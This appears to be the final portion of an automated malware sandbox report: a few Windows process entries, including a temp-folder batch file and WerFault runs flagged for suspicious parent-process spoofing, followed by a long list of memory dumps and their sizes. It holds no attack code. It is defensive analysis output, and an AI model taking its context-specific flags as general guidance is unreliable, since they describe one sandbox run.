                                                                                                                                              C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\5feb0322-1e56-4cc0-bab0-c9ce73d70666\test.bat"
                                                                                                                                              1⤵
                                                                                                                                                PID:6792
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2548 -ip 2548
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                PID:6068
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 7052 -ip 7052
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                PID:3396

                                                                                                                                              Network

                                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                                              Replay Monitor

                                                                                                                                              Loading Replay Monitor...

                                                                                                                                              Downloads

                                                                                                                                              • memory/444-500-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/476-261-0x0000000002C20000-0x0000000002C21000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/476-260-0x0000000002C20000-0x0000000002C21000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1268-276-0x00000000004E0000-0x00000000004E1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1268-311-0x0000000002760000-0x0000000002761000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1268-298-0x0000000005030000-0x0000000005031000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1268-287-0x00000000026D0000-0x00000000026DC000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                48KB

                                                                                                                                              • memory/1268-282-0x0000000002770000-0x0000000002771000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1548-649-0x0000000003410000-0x00000000034E6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                856KB

                                                                                                                                              • memory/1876-587-0x0000000005194000-0x0000000005195000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1876-565-0x0000000005192000-0x0000000005193000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1876-577-0x0000000005193000-0x0000000005194000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1876-555-0x0000000005190000-0x0000000005191000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/1896-679-0x0000000000730000-0x0000000000760000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                192KB

                                                                                                                                              • memory/2088-147-0x000001DD81860000-0x000001DD81870000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/2088-148-0x000001DD81BB0000-0x000001DD81BB4000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                16KB

                                                                                                                                              • memory/2088-146-0x000001DD80F60000-0x000001DD80F70000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/2160-482-0x000000001B280000-0x000000001B282000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/2216-235-0x0000000001A2E000-0x0000000001A51000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                140KB

                                                                                                                                              • memory/2216-268-0x00000000033B0000-0x00000000033E0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                192KB

                                                                                                                                              • memory/2256-392-0x00000000056F0000-0x00000000056F1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2288-315-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2288-301-0x00000000024C0000-0x0000000002509000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                292KB

                                                                                                                                              • memory/2288-318-0x00000000074A0000-0x00000000074A1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2288-321-0x0000000007BA0000-0x0000000007BA1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2288-283-0x0000000000230000-0x0000000000231000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2288-326-0x0000000004BE0000-0x0000000004BE1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2288-289-0x0000000000B80000-0x0000000000B81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2448-498-0x0000000000820000-0x00000000008F6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                856KB

                                                                                                                                              • memory/2448-314-0x0000000000663000-0x00000000006DF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                496KB

                                                                                                                                              • memory/2544-474-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2548-581-0x0000000005770000-0x00000000059F6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.5MB

                                                                                                                                              • memory/2564-168-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/2564-167-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/2564-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                572KB

                                                                                                                                              • memory/2564-177-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/2564-176-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/2564-174-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/2564-175-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                100KB

                                                                                                                                              • memory/2564-170-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/2564-173-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                152KB

                                                                                                                                              • memory/2564-172-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/2564-171-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/2564-169-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.5MB

                                                                                                                                              • memory/2620-329-0x0000000002F60000-0x0000000002F62000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/2620-305-0x0000000000D50000-0x0000000000D51000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2620-316-0x0000000001500000-0x0000000001501000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/2988-430-0x000000001B380000-0x000000001B382000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/3192-219-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3192-246-0x000000001B860000-0x000000001B862000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/3192-240-0x0000000001490000-0x0000000001491000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3220-516-0x0000000002F70000-0x0000000002F86000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                88KB

                                                                                                                                              • memory/3316-226-0x00000000033B0000-0x00000000033B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3316-229-0x00000000033B0000-0x00000000033B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3416-271-0x0000000000C70000-0x0000000000C71000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3416-548-0x0000000004D60000-0x0000000004DD6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                472KB

                                                                                                                                              • memory/3476-410-0x00000000021A0000-0x00000000021A1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-221-0x0000000002E80000-0x0000000002E81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-297-0x00000000083B0000-0x00000000083B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-478-0x000000007EEA0000-0x000000007EEA1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-222-0x0000000002E80000-0x0000000002E81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-275-0x0000000008300000-0x0000000008301000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-234-0x00000000030A0000-0x00000000030A1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-248-0x0000000007A40000-0x0000000007A41000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-302-0x0000000008460000-0x0000000008461000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-238-0x0000000007410000-0x0000000007411000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-427-0x0000000003055000-0x0000000003057000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/3508-242-0x0000000003050000-0x0000000003051000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-254-0x0000000007E80000-0x0000000007E81000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-255-0x0000000007EF0000-0x0000000007EF1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-250-0x0000000007220000-0x0000000007221000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-253-0x0000000007DA0000-0x0000000007DA1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-243-0x0000000003052000-0x0000000003053000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3508-251-0x0000000007D00000-0x0000000007D01000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/3668-263-0x00000000059C0000-0x0000000005B03000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                1.3MB

                                                                                                                                              • memory/4044-658-0x0000000003F00000-0x0000000003F01000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4072-267-0x0000000003390000-0x0000000003399000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/4072-236-0x0000000001839000-0x0000000001849000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4088-330-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                136KB

                                                                                                                                              • memory/4088-378-0x00000000054B0000-0x0000000005AC8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.1MB

                                                                                                                                              • memory/4136-281-0x0000000001920000-0x0000000001968000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                288KB

                                                                                                                                              • memory/4136-232-0x00000000019B9000-0x00000000019E2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                164KB

                                                                                                                                              • memory/4140-383-0x0000000005450000-0x0000000005451000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4544-559-0x0000000005650000-0x00000000058D6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.5MB

                                                                                                                                              • memory/4552-471-0x0000000005610000-0x0000000005611000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4668-591-0x0000000004BD0000-0x0000000004BD1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4768-310-0x00000000007E0000-0x00000000007F2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/4768-306-0x00000000007A0000-0x00000000007B0000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/4912-244-0x0000000002550000-0x0000000002551000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4912-239-0x0000000004C60000-0x0000000004C61000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4912-252-0x0000000005430000-0x0000000005431000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4912-245-0x0000000004E70000-0x0000000004E71000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/4912-228-0x00000000002B0000-0x00000000002B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5004-247-0x000000001BCD0000-0x000000001BCD2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/5004-233-0x0000000000FB0000-0x0000000000FB1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5184-395-0x0000000004FE0000-0x00000000055F8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.1MB

                                                                                                                                              • memory/5232-691-0x0000000005900000-0x0000000005901000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5340-696-0x00000000050B0000-0x00000000050B1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5448-351-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                80KB

                                                                                                                                              • memory/5468-686-0x0000000006030000-0x0000000006031000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5576-503-0x0000000003290000-0x0000000003299000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/5632-637-0x0000000000A50000-0x0000000000A52000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/5640-681-0x0000000003540000-0x0000000003541000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5688-486-0x0000000001940000-0x000000000196F000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                188KB

                                                                                                                                              • memory/5708-665-0x00000000059E0000-0x00000000059E1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5712-571-0x0000000005AC0000-0x0000000005D46000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.5MB

                                                                                                                                              • memory/5720-371-0x00000000020A0000-0x00000000020A1000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/5780-451-0x0000000004E70000-0x00000000050F6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.5MB

                                                                                                                                              • memory/5872-388-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                80KB

                                                                                                                                              • memory/5876-510-0x0000000000400000-0x0000000000409000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                36KB

                                                                                                                                              • memory/6004-461-0x0000000005080000-0x00000000050F6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                472KB

                                                                                                                                              • memory/6116-453-0x0000000005850000-0x0000000005851000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/6168-594-0x0000000002EC0000-0x0000000002EC2000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                8KB

                                                                                                                                              • memory/6176-584-0x0000000002950000-0x0000000002962000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                72KB

                                                                                                                                              • memory/6176-550-0x0000000002930000-0x0000000002940000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                64KB

                                                                                                                                              • memory/6272-634-0x0000000002700000-0x0000000002701000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                4KB

                                                                                                                                              • memory/6424-711-0x00000000057B0000-0x0000000005DC8000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                6.1MB

                                                                                                                                              • memory/7052-643-0x0000000005450000-0x00000000056D6000-memory.dmp

                                                                                                                                                Filesize

                                                                                                                                                2.5MB